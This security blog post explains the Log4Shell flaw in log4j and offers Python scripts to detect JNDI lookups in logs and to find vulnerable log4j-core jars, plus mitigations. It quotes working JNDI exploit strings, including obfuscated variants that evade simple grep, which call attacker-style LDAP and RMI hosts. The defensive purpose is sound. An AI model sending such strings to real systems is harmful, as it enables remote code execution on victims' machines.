Christmas has come early for threat actors

On December 10th 2021, a vulnerability in the popular Java logging framework log4j dropped on Twitter, originating from a Chinese blogger ‘yangyang’. Dubbed “Log4Shell” (CVE-2021-44228), the vulnerability is triggered when an application or library using log4j logs an untrusted string containing a JNDI lookup. log4j resolves the lookup itself: it contacts the server named in the string, fetches the Java class that server points to, and runs it, which hands the attacker arbitrary code execution on the target system.

${jndi:ldap://example.com:389/badcode} – That’s all there is to exploiting some of these vulnerable systems, placed in any field that ends up in a log line (a User-Agent header, a username, a chat message). The attacker controls example.com: their LDAP server answers with a reference to a hosted Java payload, the victim JVM downloads and executes it, and the payload would likely install a RAT or ransomware and then attempt lateral movement within the organization.
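A log-side check for strings like the one above, added here as an example and not code from the original post: this Python scanner resolves the nested lookup tricks attackers use to hide the word jndi (${lower:j}, ${::-j} and similar) before matching, which a plain grep for "${jndi:" misses. The sample access-log lines and the 203.0.113.x addresses are constructed; log4j's real substitution engine supports more lookups than this mimics, so treat it as a detection aid, not a parser of record.

```python
"""Normalise log4j lookup syntax and flag JNDI lookups in log lines.

Added example, not code from the original post. Mimics just enough of
log4j's nested-lookup evaluation (innermost ${...} first; lower:/upper:
transforms; ':-' default values) to see through common obfuscation.
"""
import re

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
MAX_ROUNDS = 64  # bound the rewrite loop so a hostile line cannot spin forever


def _evaluate(body: str, findings: list) -> str:
    """Return the text a lookup body resolves to, recording any jndi: lookup."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        findings.append(body)
        return "<jndi-lookup>"  # placeholder so the loop does not re-match it
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: an unresolvable key falls back to its default
        return body.split(":-", 1)[1]
    return ""  # unknown lookup (date:, sys:, ...): assume it resolves to nothing


def normalize(line: str):
    """Resolve nested lookups in a log line; return (normalised line, jndi lookups found)."""
    findings = []
    for _ in range(MAX_ROUNDS):
        m = INNERMOST.search(line)
        if not m:
            break
        line = line[: m.start()] + _evaluate(m.group(1), findings) + line[m.end():]
    return line, findings


def scan(lines):
    """Return (line number, jndi lookup body) for every lookup found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        _, findings = normalize(line)
        hits.extend((number, f) for f in findings)
    return hits


# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/c}"',
    '203.0.113.6 - - [10/Dec/2021:14:02:15 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOG):
        print(f"line {number}: {lookup}")
```

The fifth sample line shows why normalising first matters in the other direction too: the bare word jndi in a URL path is not a lookup and produces no hit, so the check stays usable on busy web logs.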

This vulnerability scores a 10.0 on the CVSS scale, the highest possible. Since log4j is an extremely popular library, everything from Minecraft servers to Java-powered web servers and websites is affected.

According to Twitter user @forwardsecrecy, the vulnerability can be triggered on certain devices without any direct interaction by putting the string into a WiFi SSID: a nearby device that logs the network names it sees processes the lookup just like any other logged input.

Many vulnerable systems are likely discoverable through Google and through device search engines such as Shodan.

Mitigation

We expect many more vulnerable products and exposure points to come to light in the near future, and data breaches and ransomware attacks are sure to follow.

If you have any systems running Java, triage them immediately to determine whether log4j is present (including copies bundled inside application jars and wars, not just the ones your package manager knows about) and upgrade to a fixed log4j release. If you cannot patch, a JVM argument is available as a stopgap: on log4j 2.10 and later, start the JVM with -Dlog4j2.formatMsgNoLookups=true (or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true); on older 2.x versions, remove the JndiLookup class from the jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Treat these as mitigations rather than a fix: the formatMsgNoLookups flag was later shown to be incomplete for some non-default logging configurations, so patch as soon as you can.
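One way to do that triage, added here as an example and not tooling from the original post: walk a filesystem, open every jar, war and ear, look for log4j-core's Maven version stamp and the JndiLookup class, and recurse into archives nested inside archives, which is where most missed copies hide. FIXED_VERSION is an assumption set to 2.15.0, the first fixed release; later advisories moved that bar, so set it from the current one. The sample tree the block builds is constructed (stub class bodies, not real log4j jars).

```python
"""Find log4j-core inside jars, wars and nested (fat) jars under a directory tree.

Added example, not tooling from the original post. Checks each archive for
the JndiLookup class and the Maven version stamp log4j-core ships with.
"""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 4  # fat jars inside wars inside ears; deeper than this is suspicious anyway
# Assumption: 2.15.0 was the first fixed release when this post appeared; it was
# superseded by later releases, so set this from the current Apache advisory.
FIXED_VERSION = (2, 15, 0)


def parse_version(pom_properties: str):
    """Pull (major, minor, patch) out of a Maven pom.properties text, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def verdict(version, has_jndi_lookup: bool) -> str:
    """Classify one log4j-core archive."""
    if version is not None and version >= FIXED_VERSION:
        return "patched"
    if not has_jndi_lookup:
        return "mitigated"  # JndiLookup.class stripped from the jar
    return "vulnerable"  # unknown version counts as vulnerable until proven otherwise


def inspect_archive(name: str, data: bytes, findings: list, depth: int = 0) -> None:
    """Inspect one archive held in memory and recurse into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (corrupt, or a file with a misleading suffix)
    with zf:
        names = set(zf.namelist())
        has_lookup = JNDI_LOOKUP_CLASS in names
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        if has_lookup or version is not None:
            findings.append({"archive": name, "version": version,
                             "jndi_lookup": has_lookup, "verdict": verdict(version, has_lookup)})
        if depth < MAX_NESTING:
            for entry in sorted(names):
                if entry.lower().endswith(ARCHIVE_SUFFIXES):
                    inspect_archive(f"{name}!{entry}", zf.read(entry), findings, depth + 1)


def scan_tree(root: str) -> list:
    """Walk a directory tree and inspect every archive found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for filename in files:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    inspect_archive(path, fh.read(), findings)
    return findings


def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry, content in entries.items():
            zf.writestr(entry, content)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed fixtures, not real log4j artifacts: class bodies are empty stubs."""
    old = _make_jar({JNDI_LOOKUP_CLASS: b"", POM_PROPERTIES: b"version=2.14.1\n"})
    fixed = _make_jar({JNDI_LOOKUP_CLASS: b"", POM_PROPERTIES: b"version=2.15.0\n"})
    stripped = _make_jar({POM_PROPERTIES: b"version=2.14.1\n"})  # class removed with zip -d
    fat = _make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": old, "WEB-INF/classes/App.class": b""})
    os.makedirs(os.path.join(root, "lib"))
    for rel, data in [("lib/log4j-core-2.14.1.jar", old), ("lib/log4j-core-2.15.0.jar", fixed),
                      ("lib/log4j-core-stripped.jar", stripped), ("app.war", fat)]:
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)


def demo() -> dict:
    """Build the sample tree in a temp dir, scan it, and return {archive: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {f["archive"][len(root) + 1:].replace(os.sep, "/"): f["verdict"]
                for f in scan_tree(root)}


if __name__ == "__main__":
    for archive, result in sorted(demo().items()):
        print(f"{result:11} {archive}")
```

Point scan_tree at a real root (/opt, /srv, a container image layer) and treat every "vulnerable" line as a work item. The version comparison treats the whole 2.x line as one sequence, so the backported fixes for Java 7 and Java 6 (the 2.12.x and 2.3.x lines) will show as vulnerable and need checking by hand, and a "mitigated" verdict only says the class is gone, not that the application was restarted since it was removed.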

According to the original blog post, Java Development Kit (JDK) versions newer than 6u211, 7u201, 8u191 and 11.0.1 are not vulnerable to the main LDAP vector, because those releases set com.sun.jndi.ldap.object.trustURLCodebase to false by default and refuse to load classes from a remote codebase. That does not make them safe: the JNDI lookup still fires, so exploitation may still be possible by other means, such as deserialization of the object the LDAP server returns or abuse of classes already on the application’s classpath. The post also claims that certain JDK configurations may stop exploitation.

If your company has been impacted by this vulnerability or needs assistance patching, Purple Folder can help. Schedule a quick chat to discuss what can be done to mitigate before it is too late.